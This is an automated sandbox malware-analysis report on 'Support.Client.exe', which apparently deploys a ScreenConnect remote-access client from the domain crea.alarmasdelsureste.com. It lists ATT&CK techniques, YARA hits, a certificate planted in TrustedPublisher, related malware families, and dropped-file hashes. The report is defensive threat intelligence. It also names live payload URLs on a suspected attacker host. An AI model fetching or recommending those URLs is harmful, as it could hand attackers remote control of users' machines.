                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Support.Client.exe Code function: 0_2_00C01806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C01806
                  Source: C:\Users\user\Desktop\Support.Client.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Support.Client.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match File source: 9.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match File source: 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 7604, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1216, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2944, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Windows Service | 2 Windows Service | 1 Install Root Certificate | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 51 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 51 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 51 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
                  [Behavior graph: ID 1579450, sample Support.Client.exe, start date 22/12/2024, architecture WINDOWS, score 57]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Support.Client.exe | 21% | Virustotal | |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
| C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high |
| 0bd0.adrsxpjm0rga0n.de | 104.168.134.232 | true | false | | unknown |
| crea.alarmasdelsureste.com | 104.168.134.232 | true | false | | unknown |
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.dll | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dll | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.dll | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifest | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.config | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dll | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.exe | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.config | false | | unknown |
| https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe | false | | unknown |
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.fontbureau.com/designersGdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/?dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/bThedfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers?dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exeDdfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSer8dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.tiro.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                                                  high
                                                                  https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.fontbureau.com/designersdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageSxdfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.goodfont.co.krdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSupport.Client.exe, 00000000.00000002.2002795893.000000000096B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrOX50X7XC.log.1.drfalse
                                                                              unknown
                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2jdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
IP: 104.168.134.232
Domain: 0bd0.adrsxpjm0rga0n.de
Country: United States
ASN: 54290
ASN Name: HOSTWINDSUS
Malicious: false

IP: 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579450
Start date and time: 2024-12-22 12:46:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Support.Client.exe
Detection: MAL
Classification: mal57.evad.winEXE@17/74@2/2
EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 83.3%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 63%
                                                                                                                                                                                                        • Number of executed functions: 197
                                                                                                                                                                                                        • Number of non-executed functions: 24
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 92.122.16.236, 52.168.117.173, 2.22.50.131, 2.22.50.144, 40.126.53.18, 4.175.87.197, 13.107.246.63
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                        • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2944 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
| 06:46:57 | API Interceptor | 228670x Sleep call for process: dfsvc.exe modified |
| 06:46:57 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 06:46:57 | API Interceptor | 1x Sleep call for process: Support.Client.exe modified |
| 06:47:29 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |

No context
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| fp2e7a.wpc.phicdn.net | 62f928.msi | malicious | Remcos | 192.229.221.95 |
|  | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 192.229.221.95 |
|  | P0RN-vidz.Client.exe | malicious | ScreenConnect Tool | 192.229.221.95 |
|  | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 192.229.221.95 |
|  | f4p4BwljZt.exe | malicious | LummaC | 192.229.221.95 |
|  | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 192.229.221.95 |
|  | hesaphareketi-20-12-2024-pdf.exe | malicious | AgentTesla | 192.229.221.95 |
|  | LbtytfWpvx.vbs | malicious | Remcos | 192.229.221.95 |
|  | 17345937653b107659e23b9c28725ee4827d5eb205eece8b9a5c90afbbb742a9832aaefaab913.dat-decoded.dll | malicious | Unknown | 192.229.221.95 |
|  | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 192.229.221.95 |
| bg.microsoft.map.fastly.net | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown | 199.232.210.172 |
|  | Rechnung736258.pdf.lnk | malicious | LummaC | 199.232.214.172 |
|  | Company Information.pdf.lnk | malicious | Unknown | 199.232.210.172 |
|  | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 199.232.210.172 |
|  | HX Design.exe | malicious | Python Stealer, Blank Grabber | 199.232.210.172 |
|  | 1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exe | malicious | AsyncRAT, DcRat | 199.232.210.172 |
|  | 1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exe | malicious | PureLog Stealer, zgRAT | 199.232.214.172 |
|  | Statements.pdf | malicious | WinSearchAbuse | 199.232.210.172 |
|  | INVOICE_2279_from_RealEyes Digital LLC (1).pdf | malicious | Unknown | 199.232.214.172 |
|  | Z8oTIWCyDE.exe | malicious | LummaC | 199.232.210.172 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| HOSTWINDSUS | arm5.nn.elf | malicious | Mirai, Okiru | 192.236.219.113 |
|  | lFxGd66yDa.exe | malicious | NetSupport RAT | 23.254.224.41 |
|  | Jjv9ha2GKn.exe | malicious | NetSupport RAT, DarkTortilla | 23.254.224.41 |
|  | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 23.254.224.41 |
|  | xd.mpsl.elf | malicious | Mirai | 142.11.240.128 |
|  | loligang.arm.elf | malicious | Mirai | 192.119.104.64 |
|  | loligang.ppc.elf | malicious | Mirai | 142.11.240.155 |
|  | ppc.elf | malicious | Mirai | 23.254.189.226 |
|  | mpsl.elf | malicious | Mirai | 23.254.189.241 |
|  | ppc.elf | malicious | Unknown | 192.236.246.50 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 3b5074b1b5d032e5620f69f9f700ff0e | NOTIFICATION_OF_DEPENDANTS_1.vbs | malicious | Unknown | 104.168.134.232 |
|  | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Unknown | 104.168.134.232 |
|  | HLMJbase.dll | malicious | Unknown | 104.168.134.232 |
|  | HLMJbase.dll | malicious | Unknown | 104.168.134.232 |
|  | swift-bootstrapper.exe | malicious | Unknown | 104.168.134.232 |
|  | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.168.134.232 |
|  | Rechnung736258.pdf.lnk | malicious | LummaC | 104.168.134.232 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe | statmentt.exe | malicious | ScreenConnect Tool |  |
|  | support.Client.exe | malicious | ScreenConnect Tool |  |
|  | statsment.exe | malicious | ScreenConnect Tool |  |
|  | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |  |
|  | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |  |
|  | file.exe | malicious | ScreenConnect Tool |  |
|  | setup.msi | malicious | ScreenConnect Tool |  |
|  | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |  |
|  | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |  |
|  | pzPO97QouM.exe | malicious | ScreenConnect Tool |  |
| C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe | statmentt.exe | malicious | ScreenConnect Tool |  |
|  | support.Client.exe | malicious | ScreenConnect Tool |  |
|  | statsment.exe | malicious | ScreenConnect Tool |  |
|  | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |  |
|  | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | malicious | ScreenConnect Tool |  |
|  | file.exe | malicious | ScreenConnect Tool |  |
|  | setup.msi | malicious | ScreenConnect Tool |  |
|  | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |  |
|  | monthly-eStatementForum120478962.Client.exe | malicious | ScreenConnect Tool |  |
                                                                                                                                                                                                                                              pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):1.307378622011348
Encrypted:false
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x477ec496, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.42216904276338757
Encrypted:false
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07759687858589415
Encrypted:false
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9141864628057161
Encrypted:false
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Sun Dec 22 11:46:58 2024, 0x1205a4 type
Category:dropped
Size (bytes):84808
Entropy (8bit):1.634399185053814
Encrypted:false
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8346
Entropy (8bit):3.699257685033677
Encrypted:false
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4613
Entropy (8bit):4.4769420513731575
Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zs1Jg77aI92hWpW8VYlNYm8M4JRLFM+q8mMztofKd:uIjfPI74w7ViMJsItofKd
                                                                                                                                                                                                                                                MD5:9839650671789563FA82061947F9406D
                                                                                                                                                                                                                                                SHA1:A6E4BDF6D7CC18F2E53A4FBDCAB6DF474B1AD0E5
                                                                                                                                                                                                                                                SHA-256:23E19749D64E0B9556934ECA586426CE9B29A32A4F30909F4D48A432D82AE450
                                                                                                                                                                                                                                                SHA-512:AD0484AD53382051BCABA3F6ABDE4B395AE4416FFC5E8214B04FF51B892A5D9987BD918B8DB4BBA8B16D44E921E8A80DE56348FD1D15A45657F3E8DE1E22A77B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="642409" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
